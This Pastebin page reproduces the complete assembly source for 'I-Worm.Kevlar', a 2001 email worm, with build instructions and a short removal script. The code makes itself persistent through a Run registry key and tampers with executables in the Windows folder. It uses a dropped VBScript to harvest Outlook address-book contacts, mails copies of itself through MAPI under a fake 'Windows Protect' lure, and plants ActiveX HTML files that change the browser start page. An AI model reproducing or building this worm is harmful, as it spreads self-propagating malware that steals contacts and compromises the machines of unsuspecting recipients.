API tools faq
paste
Advertisement
FlyFar

I-Worm.Kevlar - Source Code

FlyFar
Jul 27th, 2023
1,703
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
6502 TASM/64TASS 11.70 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. comment #
  2. Name : I-Worm.Kevlar
  3. Author : PetiK
  4. Date : August 7th 2001 - August 16th 2001
  5. Size : 5120 byte
  6.  
  7. Action : Copy itself to %System%\Kevlar32.exe hidden attribute
  8.             %System%\MScfg32.exe normal attribute
  9.      Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
  10.  
  11.     * Infect %Windir%\C???????.exe file on writing as "PetiK" in the file
  12.     * Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
  13.     * Create C:\__.vbs This filetake all address in th e Address Book at save them in the
  14.       %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail :
  15.  
  16.         Subject : Windows Protect !!
  17.         Body :  The smallest software to stop your computer to bug in each time.
  18.             I have found this program on WWW.KEVLAR-PROTECT.COM
  19.  
  20.             Take a look at the attchment.
  21.  
  22.                     Bye and have a nice day.
  23.  
  24.         Attachment : MScfg32.exe
  25.  
  26.     * It creates the %windir%\MSinfo32.txt. I look like this :
  27.  
  28.         [File Infected]     => Name of C???????.exe file infected
  29.         CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
  30.         CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
  31.  
  32.         [EMail saved]       => Some address found in the address book
  33.         first@mail.com=Next victim
  34.         second@mail.com=Next victim
  35.  
  36.  
  37. To build the worm:
  38. tasm32 /M /ML Kevlar
  39. tlink32 -Tpe -aa -x Kevlar,,,import32
  40. upx -9 Kevlar.exe
  41.  
  42. To delete the worm:
  43. @echo off
  44. del %windir%\system\Kevlar32.exe
  45. del %windir%\system\MScfg32.exe
  46. del %windir%\*.exe.htm
  47. del %windir%\MSinfo32.txt
  48. del %windir%\AddBook.txt
  49.  
  50. #
  51.  
  52. .586p
  53. .model flat
  54. .code
  55.  
  56. JUMPS
  57.  
  58. callx macro a
  59. extrn a:proc
  60. call a
  61. endm
  62.  
  63. include useful.inc
  64.  
  65. DEBUT: 
  66. F_NAME: push  50
  67.     mov   esi,offset Orig
  68.     push  esi
  69.     push  0
  70.     callx GetModuleFileNameA
  71.  
  72.     mov   edi,offset CopyName2
  73.     push  edi
  74.     push  50
  75.     push  edi
  76.     callx GetSystemDirectoryA
  77.     add   edi,eax
  78.     mov   eax,'cSM\'
  79.     stosd
  80.     mov   eax,'23gf'
  81.     stosd
  82.     mov   eax,'exe.'
  83.     stosd
  84.     pop   edi
  85.     push  0
  86.     push  edi
  87.     push  esi
  88.     callx CopyFileA
  89.  
  90.     mov   edi,offset CopyName
  91.     push  edi
  92.     push  50
  93.     push  edi
  94.     callx GetSystemDirectoryA
  95.     add   edi,eax
  96.     mov   al,'\'
  97.     stosb
  98.     mov   eax,'lveK'
  99.     stosd
  100.     mov   eax,'23ra'
  101.     stosd
  102.     mov   eax,'exe.'
  103.     stosd
  104.     pop   edi
  105.  
  106.     push  esi
  107.     callx GetFileAttributesA
  108.     cmp   eax,1
  109.     je    SUITE
  110.  
  111.     push  0
  112.     push  edi
  113.     push  esi
  114.     callx CopyFileA
  115.  
  116.     push  01h
  117.     push  edi
  118.     callx SetFileAttributesA
  119.  
  120.  
  121. REG:    pushad
  122.     @pushsz "SHLWAPI.dll"
  123.     callx LoadLibraryA
  124.     test  eax,eax
  125.     jz    FIN
  126.     mov   edi,eax
  127.     @pushsz "SHSetValueA"
  128.     push  edi
  129.     callx GetProcAddress
  130.     test  eax,eax
  131.     jz    FIN
  132.     mov   esi,eax
  133.     push  08h
  134.     push  offset CopyName
  135.     push  01h
  136.     @pushsz "Kevlar32"
  137.     @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  138.     push  80000002h
  139.     call  esi
  140.     push  edi
  141.     callx FreeLibrary
  142.     popad
  143.  
  144.     call  Nick
  145.    
  146.     mov   edi,offset nickname
  147.     push  40h
  148.     @pushsz "Hello, my name is :"
  149.     push  edi
  150.     push  0
  151.     callx MessageBoxA
  152.  
  153.     call  Infect
  154.  
  155.     jmp   FIN
  156.  
  157. SUITE:  call  Infect2
  158. VB_F:   pushad
  159.     push  00h
  160.     push  80h
  161.     push  02h
  162.     push  00h
  163.     push  01h
  164.     push  40000000h
  165.     @pushsz "C:\__.vbs"
  166.     callx CreateFileA
  167.     test  eax,eax
  168.     xchg  edi,eax
  169.     push  00h
  170.     push  offset octets
  171.     push  VBSSIZE
  172.     push  offset vbsd
  173.     push  edi
  174.     callx WriteFile
  175.     push  edi
  176.     callx CloseHandle
  177.     popad
  178.     push  1
  179.     @pushsz "wscript C:\__.vbs"
  180.     callx WinExec
  181.     push  10000
  182.     callx Sleep
  183.     @pushsz "C:\__.vbs"
  184.     callx DeleteFileA
  185.  
  186. SCAN1:  mov   edi,offset addbook
  187.     push  edi
  188.     push  50
  189.     push  edi
  190.     callx GetWindowsDirectoryA
  191.     add   edi,eax
  192.     mov   eax,"ddA\"
  193.     stosd
  194.     mov   eax,"kooB"
  195.     stosd
  196.     mov   eax,"txt."
  197.     stosd
  198.     xor   eax,eax
  199.     stosd
  200.     call  OPEN
  201.  
  202. FIN:    push  00h
  203.     callx ExitProcess
  204.  
  205.     Nick    Proc
  206.     mov   edi,offset nickname
  207.     callx GetTickCount
  208.     push  9
  209.     pop   ecx
  210.     xor   edx,edx
  211.     div   ecx
  212.     inc   edx
  213.     mov   ecx,edx
  214.     name_g:
  215.     push  ecx
  216.     callx GetTickCount
  217.     push  'Z'-'A'
  218.     pop   ecx
  219.     xor   edx,edx
  220.     div   ecx
  221.     xchg  eax,edx
  222.     add   al,'A'
  223.     stosb
  224.     callx GetTickCount
  225.     push  100
  226.     pop   ecx
  227.     xor   edx,edx
  228.     div   ecx
  229.     push  edx
  230.     callx Sleep
  231.     pop   ecx
  232.     loop  name_g
  233.     ret
  234.     Nick    EndP
  235.  
  236.     Infect  Proc
  237.     pushad
  238.     push  50
  239.     push  offset WinPath
  240.     callx GetWindowsDirectoryA
  241.     push  offset WinPath
  242.     callx SetCurrentDirectoryA
  243.     FFF:
  244.     push  offset Search
  245.     @pushsz "C???????.exe"
  246.     callx FindFirstFileA
  247.     inc   eax
  248.     je    F_INF
  249.     dec   eax
  250.     mov   [exeHdl],eax
  251.     I_FILE:
  252.     mov   verif,0
  253.     xor   eax,eax
  254.     push  eax
  255.     push  eax
  256.     push  03h
  257.     push  eax
  258.     push  eax
  259.     push  80000000h or 40000000h
  260.     push  offset Search.cFileName
  261.     callx CreateFileA
  262.     inc   eax
  263.     jz    FNF
  264.     dec   eax
  265.     xchg  eax,ebx
  266.  
  267.     xor   eax,eax
  268.     push  eax
  269.     push  eax
  270.     push  eax
  271.     push  04h
  272.     push  eax
  273.     push  ebx  
  274.     callx CreateFileMappingA
  275.     test  eax,eax
  276.     jz    CL1
  277.     xchg  eax,ebp
  278.  
  279.     xor   eax,eax
  280.     push  eax
  281.     push  eax
  282.     push  eax
  283.     push  06h
  284.     push  ebp
  285.     callx MapViewOfFile
  286.     test  eax,eax
  287.     jz    CL2
  288.     xchg  eax,edi
  289.    
  290.     mov   esi,eax
  291.     cmp   word ptr [esi],"ZM"
  292.     jne   CL2
  293.     cmp   byte ptr [esi+18h],"@"
  294.     jne   CL2
  295.     cmp   word ptr [esi+80h],"EP"
  296.     jne   CL2
  297.     cmp   byte ptr [esi+12h],"P"
  298.     je    CL2
  299.     mov   word ptr [esi+12h],"eP"
  300.     mov   word ptr [esi+14h],"it"
  301.     mov   byte ptr [esi+16h],"K"
  302.     inc   verif
  303.     push  edi
  304.     callx UnmapViewOfFile
  305.     CL2:
  306.     push  ebp
  307.     callx CloseHandle
  308.     CL1:
  309.     push  ebx
  310.     callx CloseHandle
  311.  
  312.     cmp   verif,1
  313.     jne   FNF
  314.     mov   edi,offset InfoFile
  315.     push  edi
  316.     push  50
  317.     push  edi
  318.     callx GetWindowsDirectoryA
  319.     add   edi,eax
  320.     mov   eax,'iSM\'
  321.     stosd
  322.     mov   eax,'3ofn'
  323.     stosd
  324.     mov   eax,'xt.2'
  325.     stosd
  326.     mov   al,'t'
  327.     stosb
  328.     pop   edi
  329.     mov   esi,edi
  330.     push  esi
  331.     @pushsz "Infected by W32.Kevlar.PetiK"
  332.     push    offset Search.cFileName
  333.     @pushsz "File Infected"
  334.     callx   WritePrivateProfileStringA
  335.  
  336.     FNF:
  337.     push  offset Search
  338.     push  [exeHdl]
  339.     callx FindNextFileA
  340.     test  eax,eax
  341.     jne   I_FILE
  342.     FC:
  343.     push  [exeHdl]
  344.     callx FindClose
  345.     F_INF:
  346.     popad
  347.     ret
  348.     Infect  EndP
  349.  
  350.     Infect2 Proc
  351.     pushad
  352.     push  50
  353.     push  offset WinPath
  354.     callx GetWindowsDirectoryA
  355.     push  offset WinPath
  356.     callx SetCurrentDirectoryA
  357.     FFF2:
  358.     push  offset Search
  359.     @pushsz "*.exe"
  360.     callx FindFirstFileA
  361.     inc   eax
  362.     je    F_INF2
  363.     dec   eax
  364.     mov   [exeHdl],eax
  365.     I_FILE2:
  366.     pushad
  367.     mov   edi,offset Search.cFileName
  368.     push  edi
  369.     callx lstrlen
  370.     add   edi,eax
  371.     mov   eax,"mth."
  372.     stosd
  373.     xor   eax,eax
  374.     stosd
  375.     push  00h
  376.     push  80h
  377.     push  02h
  378.     push  00h
  379.     push  01h
  380.     push  40000000h
  381.     push  offset Search.cFileName
  382.     callx CreateFileA
  383.     test  eax,eax
  384.     xchg  ebp,eax
  385.     push  00h
  386.     push  offset octets
  387.     push  HTMSIZE
  388.     push  offset htmd
  389.     push  ebp
  390.     callx WriteFile
  391.     push  ebp
  392.     callx CloseHandle
  393.     popad
  394.     FNF2:
  395.     push  offset Search
  396.     push  [exeHdl]
  397.     callx FindNextFileA
  398.     test  eax,eax
  399.     jne   I_FILE2
  400.     FC2:
  401.     push  [exeHdl]
  402.     callx FindClose
  403.     F_INF2:
  404.     popad
  405.     ret
  406.     Infect2 EndP
  407.  
  408. OPEN:   pushad
  409.     push  00h
  410.     push  80h
  411.     push  03h
  412.     push  00h
  413.     push  01h
  414.     push  80000000h
  415.     push  offset addbook
  416.     callx CreateFileA
  417.     inc   eax
  418.     je    NO
  419.     dec   eax
  420.     xchg  eax,ebx
  421.  
  422.     xor   eax,eax
  423.     push  eax
  424.     push  eax
  425.     push  eax
  426.     push  02h
  427.     push  eax
  428.     push  ebx
  429.     callx CreateFileMappingA
  430.     test  eax,eax
  431.     je    F1
  432.     xchg  eax,ebp
  433.  
  434.     xor   eax,eax
  435.     push  eax
  436.     push  eax
  437.     push  eax
  438.     push  04h
  439.     push  ebp
  440.     callx MapViewOfFile
  441.     test  eax,eax
  442.     je    F2
  443.     xchg  eax,esi
  444.  
  445.     push  00h
  446.     push  ebx
  447.     callx GetFileSize
  448.     cmp   eax,03h
  449.     jbe   F3                    ; is the file empty ??
  450.  
  451.     call  SCAN
  452.  
  453. F3: push  esi
  454.     callx UnmapViewOfFile
  455. F2: push  ebp
  456.     callx CloseHandle
  457. F1: push  ebx
  458.     callx CloseHandle
  459. NO: popad
  460.     ret
  461.  
  462.     SCAN:
  463.     pushad
  464.     xor   edx,edx
  465.     mov   edi,offset m_addr
  466.     push  edi
  467.     p_c:  lodsb
  468.     cmp   al," "
  469.     je    car_s
  470.     cmp   al,0dh
  471.     je    entr1
  472.     cmp   al,0ah
  473.     je    entr2
  474.     cmp   al,"!"
  475.     je    f_mail
  476.     cmp   al,"@"
  477.     je    not_a
  478.     inc   edx
  479.     not_a:  stosb
  480.         jmp p_c
  481.     car_s:  inc esi
  482.         jmp p_c
  483.     entr1:  xor al,al
  484.         stosb
  485.         pop edi
  486.         test edx,edx
  487.         je  SCAN
  488.         call SEND_MAIL
  489.         jmp SCAN
  490.     entr2:  xor al,al
  491.         stosb
  492.         pop edi
  493.         jmp SCAN
  494.     f_mail: popad
  495.         ret
  496.  
  497.     SEND_MAIL:
  498.         push  50
  499.         push  offset save_addr
  500.         callx GetWindowsDirectoryA
  501.         @pushsz "\MSinfo32.txt"
  502.         push  offset save_addr
  503.         callx lstrcat
  504.         push  offset save_addr
  505.         @pushsz "Next victim"
  506.         push  offset m_addr
  507.         @pushsz "EMail saved"  
  508.         callx   WritePrivateProfileStringA
  509.         xor   eax,eax
  510.         push  eax
  511.         push  eax
  512.         push  offset Message
  513.         push  eax
  514.         push  [MAPIHdl]
  515.         callx MAPISendMail
  516.         ret
  517.  
  518.  
  519.  
  520. .data
  521. ; ===== INSTALLATION =====
  522. Orig        db 50 dup (0)
  523. CopyName    db 50 dup (0)
  524. CopyName2   db 50 dup (0)
  525. nickname    db 11 dup (?)
  526.  
  527. ; ===== INFECTION =====
  528. InfoFile    db 50 dup (0)
  529. WinPath     db 50 dup (0)
  530. exeHdl      dd ?
  531. verif       dd ?
  532. octets      dd ?
  533.  
  534. ; ===== MAIL =====
  535. addbook     db 50 dup (0)
  536. save_addr   db 50 dup (0)
  537. m_addr      db 128 dup (?)
  538. MAPIHdl     dd 0
  539. subject     db "Windows Protect !!",00h
  540. body        db "The smallest software to stop your computer to bug in each time.",0dh,0ah
  541.         db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
  542.         db "Take a look at the attchment.",0dh,0ah,0dh,0ah
  543.         db 09h,09h,"Bye and have a nice day.",00h
  544. NameFrom    db "Your friend",00h
  545.  
  546.  
  547. Message     dd ?
  548.         dd offset subject
  549.         dd offset body
  550.         dd ?
  551.         dd ?
  552.         dd ?
  553.         dd 2
  554.         dd offset MsgFrom
  555.         dd 1
  556.         dd offset MsgTo
  557.         dd 1
  558.         dd offset Attach
  559.  
  560. MsgFrom     dd ?
  561.         dd ?
  562.         dd NameFrom
  563.         dd ?
  564.         dd ?
  565.         dd ?
  566.  
  567. MsgTo       dd ?
  568.         dd 1
  569.         dd offset m_addr
  570.         dd offset m_addr
  571.         dd ?
  572.         dd ?
  573.  
  574. Attach      dd ?
  575.         dd ?
  576.         dd ?
  577.         dd offset CopyName2
  578.         dd ?
  579.         dd ?
  580.  
  581.        
  582.  
  583. htmd:
  584. db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
  585. db '<script language=vbscript>',0dh,0ah
  586. db 'on error resume next',0dh,0ah
  587. db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
  588. db 'If err.number=429 then',0dh,0ah
  589. db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
  590. db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
  591. db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
  592. db 'Else',0dh,0ah
  593. db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
  594. db 'document.write "<font face=''verdana'' size=''3'' color=red>'
  595. db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
  596. db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
  597. db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
  598. db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
  599. db 'End If',0dh,0ah
  600. db '</script></html>',00h
  601. HTMSIZE = $-htmd
  602.  
  603. vbsd:
  604. db 'On Error Resume Next',0dh,0ah
  605. db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
  606. db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
  607. db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
  608. db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
  609. db 'c.Close',0dh,0ah
  610. db 'For Each M In L.AddressLists',0dh,0ah
  611. db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
  612. db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
  613. db 'Set P = M.AddressEntries(O)',0dh,0ah
  614. db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
  615. db 'c.WriteLine P.Address',0dh,0ah
  616. db 'c.Close',0dh,0ah
  617. db 'Next',0dh,0ah
  618. db 'End If',0dh,0ah
  619. db 'Next',0dh,0ah
  620. db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
  621. db 'c.WriteLine "!"',0dh,0ah
  622. db 'c.Close',0dh,0ah
  623. VBSSIZE = $-vbsd
  624.  
  625. signature   db "I-Worm.Kevlar coded by PetiK (c)2001",00h
  626.  
  627.  
  628. MAX_PATH        equ 260
  629. FILETIME        struct
  630. dwLowDateTime       dd ?
  631. dwHighDateTime      dd ?
  632. FILETIME        ends
  633. WIN32_FIND_DATA     struct
  634. dwFileAttributes    dd ?
  635. ftCreationTime      FILETIME ?
  636. ftLastAccessTime    FILETIME ?
  637. ftLastWriteTime     FILETIME ?
  638. nFileSizeHigh       dd ?
  639. nFileSizeLow        dd ?
  640. dwReserved0     dd ?
  641. dwReserved1     dd ?
  642. cFileName       dd MAX_PATH (?)
  643. cAlternateFileName  db 13 dup (?)
  644.             db 3 dup (?)
  645. WIN32_FIND_DATA     ends
  646.  
  647. Search      WIN32_FIND_DATA <>
  648.  
  649.  
  650. end DEBUT
  651. end
Tags: internet worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!